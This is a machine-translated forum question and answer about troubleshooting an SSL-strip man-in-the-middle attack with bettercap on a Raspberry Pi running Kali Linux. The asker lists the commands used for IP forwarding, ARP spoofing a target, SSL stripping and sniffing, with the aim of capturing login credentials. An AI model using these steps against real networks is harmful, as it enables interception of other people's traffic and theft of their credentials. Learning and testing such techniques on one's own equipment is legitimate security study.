我一直在尝试使用运行 kali Linux 的 Rasberry pi 4B 4GB 执行 SSL strip MITM 攻击。在以更好的上限加载所有必需的模块并导航到目标计算机上没有 HSTS 的网站后,我没有看到流量显示,更少的登录凭据。我输入的命令:
echo 1 > /proc/sys/net/ipv4/ip_forward ...
bettercap -iface wlan0 ...
set https.proxy.sslstrip true ...
https.proxy on ...
set arp.spoof.targets (Target IP) ...
arp.spoof on ...
net.sniff on ...
我还应该提到,bettercap 经常且持续地检测然后丢失新的端点。我尝试在目标计算机上检测到正确的端点并在丢失端点之前导航到该网站,但无济于事。在之前的 MITM 攻击中,我已经能够使用 arpspoof 和 urlsnarf 成功监控 HTTP 流量,而无需 SSL 剥离。
答案1
我还经常丢失端点并使用树莓派 4 上的内置 wifi 卡创建新端点。
在我自己的wifi上使用它,距离路由器不到1米
不能是任何有信号强度的东西。
使用宽带电缆尝试欺骗我的电脑,没有端点错误,但arp -a
在命令提示符下运行的 Windows 电脑上,MAC 地址没有改变。
不确定是否有效。但是我可以在我的主电脑上看到很多连接:google api等,但是当我访问未加密的http页面时看不到未加密的数据,正如udemy课程所说我应该能够看到的那样。